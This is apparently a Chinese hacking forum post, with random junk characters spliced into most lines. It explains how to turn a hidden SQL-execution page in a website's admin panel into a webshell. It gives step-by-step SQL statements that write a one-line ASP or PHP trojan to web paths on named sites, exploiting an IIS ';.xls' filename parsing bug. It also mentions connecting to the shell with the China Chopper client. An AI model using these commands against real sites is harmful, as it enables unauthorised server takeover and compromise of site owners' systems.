好不容易进了后台,发现啥上传啊。备份啊多木有。
- V+ F( A* M# |9 u7 A/ w) uwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的! R" Y+ L5 B5 d' R4 F1 m$ a& T e
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
& ]/ e0 Q2 t: T然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:' p, q f$ f4 ^
1.create table cmd (a varchar(50))
$ A: ]2 Y8 S0 A6 O7 ]! w2.insert into cmd (a) values (‘‘)% \' Q% \" K$ f S
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd L8 D) r3 o. H' D2 g" H- B
(把表cmd的内容导出为物理路径的一个EXCEL文件)) B4 |4 _: K N8 {
4.drop table cmd
: e* H0 x- ?1 P+ R: C# P利用IIS的BUG成功拿到了WEBSHELL。
! s8 B7 h% i) v
: {5 h( T9 m% {% ^直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
( o0 y8 J& r& q9 M5 y! C5 n) G0 n% H6 b
SQL语句意思解释:
5 \, w2 j3 E$ ? 第一句0 i7 i5 x; i$ P' Q& d$ ]
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) e; ?9 s( `2 A V% _4 u5 d$ v$ n
# w) q' f- Y* c# v7 z) I4 X4 I# | 第二句
6 _7 L0 l9 i* \& Z7 E! @$ B9 |* v 在表cmd的a字段插入一句话木马
2 {, v' X0 ?/ ?" N 第三句
& X; }7 t/ K4 I( C* V i- P3 f 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件! Z9 v# H' E/ d- d0 i Y
& P' H3 z {) |. i2 e: V- K 第四句
5 c0 l& L. d6 a, w 删除建立的cmd表
) L/ x+ h) v! z/ f$ e3 s1 s8 h o
( @: m! Y _: I/ y3 f3 C 以下内容为测试:7 f( _) y& V7 |
Access利用后台SQL执行命令功能导出WebShell:
% @( Z) K* t& Q1 Z0 c/ \. P 这个更简单:9 P. W3 w! l% ^( G. }2 ^! q% D
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
! g0 S9 |3 v d" {( w6 j 或者
3 W2 }% k& |3 |: X. K4 l, n2 j0 H& C [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]8 z! u; ?+ b! Q' y- q
% @. K5 b9 \' o* L& r6 O4 l) B. V2 P 后台有执行SQL语句功能(vote为已知表段): D' v* A4 \1 s" }& x
希望对大家有所帮助拿shell的又一个思路
8 _6 d0 v3 q2 s6 a, n1 r! T3 J |